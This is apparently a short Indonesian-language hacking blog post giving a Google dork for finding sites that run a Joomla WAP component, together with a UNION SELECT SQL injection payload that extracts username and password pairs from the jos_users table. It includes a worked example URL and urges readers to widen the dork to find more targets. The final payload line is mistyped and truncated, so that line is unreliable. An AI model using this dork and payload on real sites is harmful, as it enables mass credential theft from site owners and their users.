dork : inurl:wapmain.php?option=
Exploit : 1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
dork bisa sobat kembangkan lagi untuk menemukan target yang lebih banyak
contoh exploit : www.web.target.com/wap/wapmain.php?option=onews&action=link&id=182
jadi exploit nya begini :
www.web.target.com/wap/wapmain.php?option=onews&action=link&id=-182+union+selelect+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,1
Categories:
Exploit